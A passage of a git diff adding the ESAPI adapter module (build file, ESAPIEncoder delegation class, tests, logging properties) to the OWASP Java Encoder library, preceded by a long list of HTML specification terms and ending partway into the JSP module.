values +rules for parsing floating point number values +rules for parsing integers +rules for parsing non-negative\n integers +rules for parsing non-negative\n integers +rules for parsing non-negative\n integers +rules for parsing non-negative integers +rules for parsing signed integers +rules for parsing simple color values +rules for serializing simple color values +rules for updating\n the text track rendering +rules for updating the\n display of WebVTT text tracks +rules for updating the display of\n WebVTT text tracks +rules for updating the display of WebVTT\n text tracks +rules for updating the display of WebVTT text\n tracks +rules for updating the text\n track rendering +rules for updating the text track\n rendering +rules for updating the text track rendering +run\n pre-click activation steps +run\n canceled activation steps +run canceled activation\n steps +run post-click activation steps +run pre-click\n activation steps +run synthetic click\n activation steps +run synthetic click activation\n steps +run synthetic click activation steps +runs +s +salvageable +same +same\n origin +same\n origin +same\n origin +same\n origin +same origin +samp +sandbox +sandboxed\n automatic features browsing context flag +sandboxed\n automatic features browsing context flag +sandboxed\n navigation browsing context flag +sandboxed\n top-level navigation browsing context flag +sandboxed\n plugins browsing context flag +sandboxed automatic features browsing\n context flag +sandboxed forms\n browsing context flag +sandboxed into a unique origin +sandboxed navigation browsing context flag +sandboxed origin\n browsing context flag +sandboxed plugins browsing context flag +sandboxed scripts browsing context flag +sandboxed seamless iframes flag +sandboxed top-level navigation browsing\n context flag +satisfies its constraints +satisfy its constraints +satisfy their\n constraints +scheme +scope +scoped +script +script\n content restrictions +script\n data escaped state +script\n execution environment +script\n documentation +script content restrictions +script data\n state +script data\n double escaped state +script data\n escaped state +script data\n state +script data double escape end state +script data double escape start\n state +script data double escaped\n state +script data double escaped dash\n state +script data double escaped dash dash\n state +script data double escaped less-than\n sign state +script data double escaped state +script data end tag name state +script data end tag open state +script data escape start dash\n state +script data escape start state +script data escaped dash dash\n state +script data escaped dash state +script data escaped end tag name\n state +script data escaped end tag open state +script data escaped less-than sign\n state +script data escaped state +script data less-than sign state +script data state +script documentation +script error notifications +script execution environment +script nesting level +script's\n browsing context +script's\n document +script's\n global object +script's URL character\n encoding +script's URL character\n encoding +script's URL character encoding +script's base URL +script's browsing\n context +script's browsing context +script's document +script's global\n object +script's global\n object +script's global object +script-created parser +scripting +scripting disabled +scripting flag +scripting is\n disabled +scripting is\n disabled +scripting is disabled +scripting is enabled +scripting was enabled +scripting was enabled or not +scripts +scroll +scroll an element into view +scroll to the fragment\n identifier +scroll to the fragment identifier +scrollAmount +scrollDelay +scrollbars +scrolling +seamless +seamless\n browsing context flag +seamless\n browsing context flag +seamless\n iframe +seamless browsing context flag +search +secondary\n browsing context +secondary browsing\n context +section +section\n 6 of the W3C Patent Policy +sectionRowIndex +sectioning +sectioning\n content +sectioning\n content +sectioning\n root +sectioning content +sectioning root +sectioning roots +sections +secured +seek +seek the\n media controller +seek the\n media controller +seek the media\n controller +seek the media controller +seekable +seeked +seeking +select +select() +selected +selected\n coordinate +selected\n files +selected files +selectedIndex +selectedOptions +selectedness +selectionDirection +selectionEnd +selectionStart +self +self-closing start tag\n state +self-closing start tag state +sends a signal +session\n history entry +session\n histories +session\n history +session histories +session history +session history\n entry +session history\n entry +session history entries +session history entry +set\n of space-separated tokens +set of\n scripts that will execute as soon as possible +set of\n scripts that will execute as soon as possible +set of\n comma-separated tokens +set of comma-separated tokens +set of space-separated\n tokens +set of space-separated tokens +set the document's address +set the value of a new\n indexed property +setCustomValidity +setCustomValidity() +setData +setDragImage +setDragImage() +setInterval +setInterval() +setSelectionRange +setSelectionRange() +setTimeout +setTimeout() +setter +setter creator +shape +sheet +should be used +showModalDialog +showModalDialog() +showing +showing by\n default +showing by default +shows caching\n progress +shows caching progress +simple\n color +simple\n color +simple color +single page HTML +size +sizes +skip White_Space\n characters +slaved +slaved\n media elements +slaved\n media elements +slaved media\n elements +slaved media\n elements +slaved media element +slaved media elements +slide +slots +small +snapToLines +sniffed type of the\n resource +soft +source +source\n node +source\n node +source\n browsing context +source\n browsing context +source browsing\n context +source browsing\n context +source browsing\n context +source browsing context +source node +space\n characters +space\n characters +space\n character +space\n characters +space\n characters +space\n characters +space character +space characters +spacer +span +special +specially focusable +specified +specifies +specifies an\n operation +specify an\n operation +spellcheck +spin the event loop +spins\n the event loop +split it on\n spaces +split on\n spaces +split on\n spaces +split on spaces +split the\n attribute's value on spaces +split the\n string on commas +split the attribute value on commas +split the attribute's\n value on spaces +split the content\n attribute on spaces +splitting value on spaces +splitting on commas +src +srcdoc +srclang +stack\n of open elements +stack\n of open elements +stack of\n open elements +stack of\n open elements +stack of\n open elements +stack of open\n elements +stack of open\n elements +stack of open\n elements +stack of open\n elements +stack of open\n elements +stack of open elements +stall timeout +stalled +standby +start +start\n tag +start\n times +start tag +start time +start times +startOffsetTime +startTime +state +state\n objects +state object +state objects +statically validate the\n constraints +status +statusbar +step +step\n base +step base +step scale\n factor +step scale factor +stepDown +stepDown() +stepMismatch +stepUp +stepUp() +steps to expose a\n media-resource-specific text track +stop +stop parsing +stopped +stopped due to errors +stopped parsing +stops +stops\n parsing +storage\n mutex +storage mutex +strictly splitting the\n string +strike +strip leading\n and trailing whitespace +strip leading and\n trailing whitespace +strip leading and\n trailing whitespace +stripped line breaks +stripping leading and trailing whitespace +strong +structured\n clone +structured\n clone +structured clone +style +style rule suggested in the rendering\n section +style sheet\n ready +style sheet ready +stylesheet +styling processing\n model +styling processing model +sub +submit +submit\n button +submit\n buttons +submit button +submit buttons +submit() +submittable +submittable elements +submitted +submitting +subscribe +subtitle +subtitles +suffer from a step\n mismatch +suffer from a step mismatch +suffering from a\n type mismatch +suffering from a custom\n error +suffering from a custom error +suffering from a pattern mismatch +suffering from a step mismatch +suffering from a type mismatch +suffering from an\n overflow +suffering from an\n underflow +suffering from an overflow +suffering from an underflow +suffering from being\n missing +suffering from being missing +suffering from being too long +suggestions\n source element +suggestions source\n element +suggestions source element +summary +sup +support the scripting\n language +supported\n property names +supported property\n indices +supported property indices +supported property names +supporting the suggested\n default rendering +suspend +svg +swapCache +swapCache() +synchronous\n section +synchronous\n section +synchronous\n sections +synchronous\n section +synchronous section +synchronous sections +syntax for which +tBodies +tFoot +tHead +tabIndex +tabindex +table +table\n model +table layout techniques +table model +table model\n errors +table model error +tables +tag +tag\n name state +tag cloud +tag name +tag name\n state +tag open state +tags +target +target element +task +task\n queue +task\n queue +task\n queues +task\n queues +task\n source +task\n queue +task queue +task queues +task source +task sources +tasks +tbody +td +techniques for describing\n tables +tel +temporary\n buffer +temporary buffer +term +text +text\n track cue writing direction +text\n track +text\n track cue writing direction +text\n track +text\n nodes +text\n track +text\n track cue active flag +text\n track kind +text\n tracks +text\n node +text\n track +text\n track cue size +text\n track cue writing direction +text\n track mode +text\n tracks +text field +text node +text nodes +text track +text track\n cue +text track\n mode +text track\n cue order +text track\n cues +text track\n cue +text track\n cue display state +text track\n cue start time +text track\n kind +text track\n label +text track\n mode +text track\n cue +text track\n cues +text track\n mode +text track\n readiness state +text track cue +text track cue\n display state +text track cue\n pause-on-exit flag +text track cue\n active flag +text track cue\n end time +text track cue\n identifier +text track cue\n pause-on-exit flag +text track cue\n size +text track cue\n start time +text track cue\n text +text track cue\n writing direction +text track cue\n identifier +text track cue\n order +text track cue\n pause-on-exit flag +text track cue\n size +text track cue\n text +text track cue active\n flag +text track cue active\n flag +text track cue active flag +text track cue display state +text track cue end\n time +text track cue end\n time +text track cue end time +text track cue identifier +text track cue order +text track cue pause-on-exit\n flag +text track cue pause-on-exit\n flag +text track cue pause-on-exit flag +text track cue size +text track cue start\n time +text track cue start\n time +text track cue start time +text track cue text +text track cue writing\n direction +text track cue writing direction +text track cues +text track disabled +text track failed to load +text track hidden +text track kind +text track label +text track language +text track list of cues +text track loaded +text track loading +text track mode +text track not loaded +text track readiness\n state +text track readiness\n state +text track readiness state +text track showing +text tracks +text-level semantics\n usage summary +text/cache-manifest +text/html +text/plain +textContent +textLength +textPosition +textTracks +textTracks[ +textarea +textarea effective height +textarea effective width +tfoot +th +that algorithm +the\n resource's Content-Type metadata +the\n script block's type +the\n script block's type +the\n resource's Content-Type metadata +the\n directionality +the\n document's address +the\n title element +the\n address +the\n directionality +the\n document's current address +the\n script block's type +the\n title element +the\n conditions described above +the\n incumbent body element +the\n html element +the\n HTML syntax +the\n active formatting elements are reconstructed +the\n body element +the\n directionality +the\n document's address +the\n document's current address +the\n drag data item kind +the\n link is an alternative stylesheet +the\n rules for choosing a browsing context given a browsing context\n name +the\n script settings determined from the node +the Document's address +the applet\n element +the embed element +the head\n element +the head element +the html element +the object element +the title\n element +the title element +the origin it was\n assigned when its browsing context was created +the HTML\n syntax +the HTML syntax +the URL given by this\n link +the W3C CVS server +the XHTML\n syntax +the XHTML\n syntax +the XHTML syntax +the attributes common to all media\n elements +the body\n element +the body\n element +the body\n element +the body element +the current address +the directionality +the document's\n address +the document's\n current address +the document's\n address +the document's address +the document's current\n address +the document's current address +the document's domain +the drag data\n item type string +the drag data item\n kind +the drag data item\n kind +the drag data item\n kind +the drag data item kind +the drag data item type\n string +the drag data item type string +the encoding of the\n document itself +the event handler processing algorithm +the example in the File\n Upload state section +the handling for misnested tags +the indicated part of the\n document +the indicated part of the\n document +the indicated part of the document +the link is an\n alternative stylesheet +the location bar BarProp\n object +the manifest +the menu bar BarProp\n object +the next step +the personal bar BarProp\n object +the rendering section +the requirements given in the prose +the resource's Content-Type\n metadata +the resource's Content-Type\n metadata +the rules\n described previously +the rules for choosing a\n browsing context given a browsing context name +the rules for choosing a browsing context given a\n browsing context name +the rules for choosing a browsing context given a browsing\n context name +the script\n block's type +the script\n settings determined from the node +the script block's\n character encoding +the script block's\n type +the script block's\n type +the script block's character encoding +the script block's fallback character\n encoding +the script block's fallback character\n encoding +the script block's source +the script block's type +the scrollbar BarProp\n object +the section on\n footnotes +the section the linking element is most\n closely associated with +the sniffed type of the resource +the stack +the status bar BarProp\n object +the step labeled\n "fragment identifiers" +the text tracks are ready +the toolbar BarProp\n object +thead +their document's current\n address +this +this is\n a reference, not a copy +this is a reference, not a copy +through which +time +time-zone\n offset +time-zone offset +timeline\n offset +timeline offset +timeupdate +title +toBlob +toDataURL +toDataURL() +toggle +tokenization +tokenizer +tooLong +toolbar +top +top-level\n browsing context +top-level\n browsing context +top-level\n browsing context +top-level browsing\n context +top-level browsing\n context +top-level browsing\n context +top-level browsing\n context +top-level browsing\n contexts +top-level browsing context +top-level browsing contexts +tr +track +track\n URL +track\n label +track URL +track label +track language +trademark +transparent +transparently follow the redirect +traverse the\n history by a delta +traverse the history by\n a delta +traverse the history by a\n delta +traverse the history by a delta +traversing the\n history +tree\n order +tree\n order +tree\n construction +tree\n order +tree construction +tree order +true-by-default +trueSpeed +truespeed +trusted +tt +turn off +turned off +turned on +type +type\n sniffing rules +type blacklist +type information +type string +typeMismatch +typeMustMatch +typemustmatch +types +u +ul +unavailable +undo transaction history +unfocusing\n steps +unfocusing steps +unique\n identifier +unique identifier +unique identifier (ID) +unit\n of related similar-origin browsing contexts +unit of\n related similar-origin browsing contexts +unit of related browsing\n contexts +unit of related browsing contexts +unit of related similar-origin browsing\n contexts +unit of related similar-origin browsing contexts +unload a\n document +unload a document +unloading document cleanup steps +unordered\n set of unique space-separated tokens +unordered set of unique\n space-separated tokens +unordered set of unique space-separated tokens +unquoted +unregisterContentHandler +unregisterProtocolHandler +up +update +update\n status +update status +update the\n image data +update the\n session history with the new page +update the image data +update the session\n history with the new page +update the session history with\n the new page +update the session history with the new\n page +update the session history with the new page +updated the image\n data +updateready +updating the session history with\n the new page +upgrade\n attempt +upgrade\n attempt +upgrade attempt +use the plugin that supports resource type +use-credentials +useMap +used during the parsing +usemap +user\n interaction task source +user interaction +user interaction task\n source +user interaction task\n source +user interaction task source +userAgent +using the\n rules for +using the rules for +vAlign +vCard MIME Directory\n Profile +vLink +valid +valid\n URL +valid\n integer +valid\n MIME type +valid\n date string +valid\n date string in content with optional time +valid\n floating point number +valid\n floating point numbers +valid\n forced-UTC global date and time string +valid\n global date and time string +valid\n integer +valid\n local date and time string +valid\n media query +valid\n month string +valid\n non-empty URL potentially surrounded by spaces +valid\n non-negative integers +valid\n simple color +valid\n time string +valid\n week string +valid MIME\n type +valid MIME type +valid MIME type with no parameters +valid MIME types with no parameters +valid URL +valid URL\n potentially surrounded by spaces +valid URL potentially\n surrounded by spaces +valid URL potentially surrounded by\n spaces +valid browsing\n context name or keyword +valid browsing\n context names or keywords +valid browsing context\n name +valid browsing context\n name or keyword +valid browsing context name +valid browsing context name\n or keyword +valid date\n string +valid date or\n time string +valid date or time string +valid date or time string in content +valid date string +valid date string with\n optional time +valid date string with optional\n time +valid e-mail address +valid e-mail address\n list +valid e-mail address list +valid floating\n point number +valid floating point\n number +valid floating point\n numbers +valid floating point number +valid floating point numbers +valid forced-UTC\n global date and time string +valid forced-UTC global date and time\n string +valid global\n date and time string +valid global date and\n time strings +valid global date and\n time string +valid global date and time\n string +valid global date and time string +valid hash-name reference +valid integer +valid integers +valid list of\n integers +valid local date and\n time string +valid local date and time\n string +valid local date and time string +valid lowercase simple color +valid media query +valid month\n string +valid month string +valid non-empty\n URL potentially surrounded by spaces +valid non-empty URL +valid non-empty URL potentially\n surrounded by spaces +valid non-empty URL potentially surrounded by\n spaces +valid non-negative\n integer +valid non-negative\n integers +valid non-negative integer +valid simple color +valid time\n string +valid time string +valid week\n string +valid week string +validationMessage +validity +validity states +valign +value +value\n sanitization algorithm +value mode\n flag +value mode flag +value sanitization\n algorithm +value sanitization\n algorithm +value sanitization algorithm +values +valueAsDate +valueAsDate +valueAsNumber +valueMissing +valueType +values +values are\n reset +valuetype +var +various W3C HTML WG\n lists +various WHATWG lists +version +vertical\n growing right +vertical growing\n left +vertical growing\n right +vertical growing\n left +vertical growing left +vertical growing right +video +videoHeight +videoTracks +videoWidth +violation +visible +vlink +vlinkColor +void elements +volume +volumechange +vspace +waiting +wbr +web developer edition +week +week number of\n the last day +week number of the last day +whatwg@whatwg.org +when the metadata of the clip becomes\n known +whitelisted scheme +whitespace +whitespace trimming +width +width of the\n select's labels +will +will\n not +will be fired +will cause +willValidate +willful\n violation +willful violation +window +window.alert() +window.applicationCache +window.close() +window.open() +wrap +write +writeln +writing direction +xml:base +xml:lang +xmp +yet more restrictions +yieldForStorageUpdates diff --git a/esapi/pom.xml b/esapi/pom.xml new file mode 100644 index 0000000..cc26851 --- /dev/null +++ b/esapi/pom.xml @@ -0,0 +1,73 @@ + + + + + 4.0.0 + + + org.owasp.encoder + encoder-parent + 1.2.3 + + + encoder-esapi + jar + + ESAPI Thunk + + The OWASP Encoders ESAPI Thunk provides an easy way to plugin the Encoder + Projects API into an implementation of ESAPI. + + + + org.owasp.encoder.esapi + + + + + org.owasp.encoder + encoder + ${project.parent.version} + + + org.owasp.esapi + esapi + [2.2.3.1,3) + + + diff --git a/esapi/src/main/java/org/owasp/encoder/esapi/ESAPIEncoder.java b/esapi/src/main/java/org/owasp/encoder/esapi/ESAPIEncoder.java new file mode 100644 index 0000000..02334bd --- /dev/null +++ b/esapi/src/main/java/org/owasp/encoder/esapi/ESAPIEncoder.java @@ -0,0 +1,254 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + +package org.owasp.encoder.esapi; + +import java.io.IOException; +import java.net.URI; +import org.owasp.encoder.Encode; +import org.owasp.esapi.Encoder; +import org.owasp.esapi.codecs.Codec; +import org.owasp.esapi.errors.EncodingException; +import org.owasp.esapi.reference.DefaultEncoder; + +/** + * ESAPIEncoder is a singleton implementation of the ESAPI Encoder API. It + * is meant to allow quick and easy drop-in replacement of the default + * encoder included with the ESAPI library, as the Encoder libraries are + * faster and use less memory thus cause fewer garbage collections. + * + *

    Please note that the OWASP Java Encoders does not implement all + * the encodings of the ESAPI Encoder API. In such situations this + * implementation will fallback onto the default reference implementation + * included with ESAPI. Thus you should see the performance benefit from + * the methods included in the Encoder, but still maintain compatibility + * with all methods from ESAPI Encoder.

    + * + *

    For clarity, the reason the OWASP Java Encoders do not include some + * of the ESAPI library is that the Encoders library is specifically focused + * on encoding, and thus does not include:

    + * + *
      + *
    • Input validation/normalization methods: + * {@link org.owasp.esapi.Encoder#canonicalize(String)}, + * {@link org.owasp.esapi.Encoder#canonicalize(String, boolean)}, + * {@link org.owasp.esapi.Encoder#canonicalize(String, boolean, boolean)} + * {@link org.owasp.esapi.Encoder#getCanonicalizedURI(URI)}
      • + * + *
    • Decoding methods: + * {@link org.owasp.esapi.Encoder#decodeForHTML(String)}, + * {@link org.owasp.esapi.Encoder#decodeFromURL(String)}
      • + * + *
    • Binary-to-text/text-to-binary: + * {@link org.owasp.esapi.Encoder#encodeForBase64(byte[], boolean)}, + * {@link org.owasp.esapi.Encoder#decodeFromBase64(String)}.
      • + * + *
    • Bind-able APIs (such as {@link java.sql.PreparedStatement}: + * {@link org.owasp.esapi.Encoder#encodeForSQL(org.owasp.esapi.codecs.Codec, String)}, + * {@link org.owasp.esapi.Encoder#encodeForXPath(String)}, + * {@link org.owasp.esapi.Encoder#encodeForOS(org.owasp.esapi.codecs.Codec, String)}
      • + * + *
    • Rarely-used or alternate compatible encoding: + * {@link org.owasp.esapi.Encoder#encodeForVBScript(String)}, + * {@link org.owasp.esapi.Encoder#encodeForLDAP(String)}, + * {@link org.owasp.esapi.Encoder#encodeForLDAP(String, boolean)}, + * {@link org.owasp.esapi.Encoder#encodeForDN(String)}
      • + *
    + * + *

    (Please note that with sufficient feedback from the user base, the above + * mentioned methods may be implemented in future releases of the OWASP + * Java Encoders, if/when that happens, this shim class will be updated to + * call out to the new methods.)

    + * + *

    You may notice that this class does not actually implement Encoder + * itself. Instead it simply provides a {@link #getInstance()} method that + * does. This allows the implementation details maximum flexibility by not + * creating a any public API that would restrict changes later

    + * + * @author jeffi + */ +public final class ESAPIEncoder { + + /** No instances. */ + private ESAPIEncoder() {} + + /** + * Returns an instance of the Encoder. This method is the only supported + * mechanism by which an ESAPIEncoder instance should be obtained. The + * returned implementation is guaranteed to be thread-safe for the methods + * that the OWASP Java Encoders implement (see class documentation). + * Though not a requirement of the ESAPI Encoder API, the returned value + * is also serializable. + * + * @return An encoder implementation that uses the OWASP Java Encoders + * for most of the common encoding methods. + */ + public static Encoder getInstance() { + return Impl.INSTANCE; + } + + /** + * This is the private singleton that implements the ESAPI Encoder shim. + * It is implemented as a single-value enum to get all the "free" singleton + * properties associated with enums--such as serialization, and on-demand + * initialization. + * + *

    The implementation is intentionally private to avoid any API baggage. + * The instance should be obtained using + * {@link org.owasp.encoder.esapi.ESAPIEncoder#getInstance()}.

    + */ + private enum Impl implements Encoder { + /** + * The singleton instance. + */ + INSTANCE; + + /** + * The reference encoder from ESAPI. Any ESAPI method without an + * OWASP Java Encoder equivalent is delegated to this instance. + */ + private final Encoder _referenceEncoder = DefaultEncoder.getInstance(); + + /** {@inheritDoc} */ + public String canonicalize(String s) { + return _referenceEncoder.canonicalize(s); + } + + /** {@inheritDoc} */ + public String canonicalize(String s, boolean strict) { + return _referenceEncoder.canonicalize(s, strict); + } + + /** {@inheritDoc} */ + public String canonicalize(String s, boolean restrictMultiple, boolean restrictMixed) { + return _referenceEncoder.canonicalize(s, restrictMultiple, restrictMixed); + } + + /** {@inheritDoc} */ + public String getCanonicalizedURI(URI dirtyUri) { + return _referenceEncoder.getCanonicalizedURI(dirtyUri); + } + + /** {@inheritDoc} */ + public String encodeForCSS(String s) { + return Encode.forCssString(s); + } + + /** {@inheritDoc} */ + public String encodeForHTML(String s) { + return Encode.forHtml(s); + } + + /** {@inheritDoc} */ + public String decodeForHTML(String s) { + return _referenceEncoder.decodeForHTML(s); + } + + /** {@inheritDoc} */ + public String encodeForHTMLAttribute(String s) { + return Encode.forHtmlAttribute(s); + } + + /** {@inheritDoc} */ + public String encodeForJavaScript(String s) { + return Encode.forJavaScript(s); + } + + /** {@inheritDoc} */ + public String encodeForVBScript(String s) { + return _referenceEncoder.encodeForVBScript(s); + } + + /** {@inheritDoc} */ + public String encodeForSQL(Codec codec, String s) { + return _referenceEncoder.encodeForSQL(codec, s); + } + + /** {@inheritDoc} */ + public String encodeForOS(Codec codec, String s) { + return _referenceEncoder.encodeForOS(codec, s); + } + + /** {@inheritDoc} */ + public String encodeForLDAP(String s) { + return _referenceEncoder.encodeForLDAP(s); + } + + /** {@inheritDoc} */ + public String encodeForLDAP(String s, boolean b) { + return _referenceEncoder.encodeForLDAP(s, b); + } + + /** {@inheritDoc} */ + public String encodeForDN(String s) { + return _referenceEncoder.encodeForDN(s); + } + + /** {@inheritDoc} */ + public String encodeForXPath(String s) { + return _referenceEncoder.encodeForXPath(s); + } + + /** {@inheritDoc} */ + public String encodeForXML(String s) { + return Encode.forXml(s); + } + + /** {@inheritDoc} */ + public String encodeForXMLAttribute(String s) { + return Encode.forXmlAttribute(s); + } + + /** {@inheritDoc} */ + public String encodeForURL(String s) throws EncodingException { + return Encode.forUri(s); + } + + /** {@inheritDoc} */ + public String decodeFromURL(String s) throws EncodingException { + return _referenceEncoder.decodeFromURL(s); + } + + /** {@inheritDoc} */ + public String encodeForBase64(byte[] bytes, boolean wrap) { + return _referenceEncoder.encodeForBase64(bytes, wrap); + } + + /** {@inheritDoc} */ + public byte[] decodeFromBase64(String s) throws IOException { + return _referenceEncoder.decodeFromBase64(s); + } + + } +} diff --git a/esapi/src/main/resources/META-INF/LICENSE b/esapi/src/main/resources/META-INF/LICENSE new file mode 100644 index 0000000..f66c375 --- /dev/null +++ b/esapi/src/main/resources/META-INF/LICENSE @@ -0,0 +1,33 @@ +Copyright (c) 2015 Jeff Ichnowski +All rights reserved. + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions +are met: + + * Redistributions of source code must retain the above + copyright notice, this list of conditions and the following + disclaimer. + + * Redistributions in binary form must reproduce the above + copyright notice, this list of conditions and the following + disclaimer in the documentation and/or other materials + provided with the distribution. + + * Neither the name of the OWASP nor the names of its + contributors may be used to endorse or promote products + derived from this software without specific prior written + permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +OF THE POSSIBILITY OF SUCH DAMAGE. \ No newline at end of file diff --git a/esapi/src/site/site.xml b/esapi/src/site/site.xml new file mode 100644 index 0000000..743ef44 --- /dev/null +++ b/esapi/src/site/site.xml @@ -0,0 +1,41 @@ + + + + + + \ No newline at end of file diff --git a/esapi/src/test/java/org/owasp/encoder/esapi/ESAPIEncoderTest.java b/esapi/src/test/java/org/owasp/encoder/esapi/ESAPIEncoderTest.java new file mode 100644 index 0000000..7443996 --- /dev/null +++ b/esapi/src/test/java/org/owasp/encoder/esapi/ESAPIEncoderTest.java @@ -0,0 +1,49 @@ +package org.owasp.encoder.esapi; + +import java.io.ByteArrayInputStream; +import java.io.ByteArrayOutputStream; +import java.io.ObjectInputStream; +import java.io.ObjectOutputStream; +import junit.framework.Test; +import junit.framework.TestCase; +import junit.framework.TestSuite; +import org.owasp.esapi.ESAPI; +import org.owasp.esapi.Encoder; + +/** + * ESAPIEncoderTest + * + * @author jeffi + */ +public class ESAPIEncoderTest extends TestCase { + public static Test suite() { + return new TestSuite(ESAPIEncoderTest.class); + } + + public void testEncode() throws Exception { + // Note: ESAPI reference encodes as: "<>&Ω" + // That's 25 characters to OWASP Java Encoder's 14. + assertEquals("<>&\u03a9", ESAPI.encoder().encodeForXML("<>&\u03a9")); + } + + public void testSerialization() throws Exception { + // Note: ESAPI reference implementation is NOT serializable. Maybe + // it will be in the future. Our implementation is however + // guaranteed serializable. + + Encoder encoder = ESAPI.encoder(); + + ByteArrayOutputStream baos = new ByteArrayOutputStream(); + + ObjectOutputStream oos = new ObjectOutputStream(baos); + oos.writeObject(encoder); + oos.close(); + + ObjectInputStream ois = new ObjectInputStream( + new ByteArrayInputStream(baos.toByteArray())); + + Encoder deserializedEncoder = (Encoder)ois.readObject(); + + assertSame(encoder, deserializedEncoder); + } +} diff --git a/esapi/src/test/resources/.esapi/ESAPI.properties b/esapi/src/test/resources/.esapi/ESAPI.properties new file mode 100644 index 0000000..d1d5f41 --- /dev/null +++ b/esapi/src/test/resources/.esapi/ESAPI.properties @@ -0,0 +1,38 @@ +# Properties based on ESAPI 2.2.1.1's configuration/esapi/ESAPI.properties file. + +ESAPI.Encoder=org.owasp.encoder.esapi.ESAPIEncoder + +# Log4JFactory Requires log4j.xml or log4j.properties in classpath - http://www.laliluna.de/log4j-tutorial.html +# Note that this is now considered deprecated! +#ESAPI.Logger=org.owasp.esapi.logging.log4j.Log4JLogFactory + +# To use JUL, you need to obtain ESAPI's esapi-java-logging.properties and drop +# it somewhere into your class path. You can get it from the ESAPI configuration +# jar. (See Release 2.2.1.1 under GitHub for ESAPI/esapi-java-legacy.) +ESAPI.Logger=org.owasp.esapi.logging.java.JavaLogFactory + +# To use the new SLF4J logger in ESAPI (see GitHub issue #129), set +#ESAPI.Logger=org.owasp.esapi.logging.slf4j.Slf4JLogFactory +# and do whatever other normal SLF4J configuration that you normally would do for your application. + +# Note: The uncommented out ones are those needed for SLF4J. Others may be +# needed if you change the ESAPI logger. +#=========================================================================== +# ESAPI Logging +# Set the application name if these logs are combined with other applications +Logger.ApplicationName=ESAPI-Shim-Test +# If you use an HTML log viewer that does not properly HTML escape log data, you can set LogEncodingRequired to true +Logger.LogEncodingRequired=false +# Determines whether ESAPI should log the application name. This might be clutter in some single-server/single-app environments. +Logger.LogApplicationName=true +# Determines whether ESAPI should log the server IP and port. This might be clutter in some single-server environments. +Logger.LogServerIP=false +# LogFileName, the name of the logging file. Provide a full directory path (e.g., C:\\ESAPI\\ESAPI_logging_file) if you +# want to place it in a specific directory. +#Logger.LogFileName=ESAPI_logging_file +# MaxLogFileSize, the max size (in bytes) of a single log file before it cuts over to a new one (default is 10,000,000) +#Logger.MaxLogFileSize=10000000 +# Determines whether ESAPI should log the user info. +Logger.UserInfo=false +# Determines whether ESAPI should log the session id and client IP +Logger.ClientInfo=false diff --git a/esapi/src/test/resources/esapi-java-logging.properties b/esapi/src/test/resources/esapi-java-logging.properties new file mode 100644 index 0000000..71011ac --- /dev/null +++ b/esapi/src/test/resources/esapi-java-logging.properties @@ -0,0 +1,6 @@ +handlers= java.util.logging.ConsoleHandler +.level= INFO +java.util.logging.ConsoleHandler.level = INFO +java.util.logging.ConsoleHandler.formatter = java.util.logging.SimpleFormatter +java.util.logging.SimpleFormatter.format=[%1$tF %1$tT] [%3$-7s] %5$s %n +#https://www.logicbig.com/tutorials/core-java-tutorial/logging/customizing-default-format.html \ No newline at end of file diff --git a/jsp/pom.xml b/jsp/pom.xml new file mode 100644 index 0000000..2b9024c --- /dev/null +++ b/jsp/pom.xml @@ -0,0 +1,93 @@ + + + + + 4.0.0 + + + org.owasp.encoder + encoder-parent + 1.2.3 + + + encoder-jsp + jar + + JSP Encoder + + The OWASP Encoder JSP package contains JSP tag definitions and TLDs to allow + easy use of the OWASP Encoder Project's core API. The TLDs contain both tag + definitions and JSP EL functions. + + + + org.owasp.encoder.jsp + + + + + org.owasp.encoder + encoder + ${project.parent.version} + + + javax.servlet.jsp + javax.servlet.jsp-api + 2.2.1 + provided + + + javax.servlet + javax.servlet-api + 3.0.1 + test + + + org.springframework + spring-test + 5.1.3.RELEASE + test + + + org.springframework + spring-core + 5.3.19 + test + + + diff --git a/jsp/src/main/java/org/owasp/encoder/tag/EncodingTag.java b/jsp/src/main/java/org/owasp/encoder/tag/EncodingTag.java new file mode 100644 index 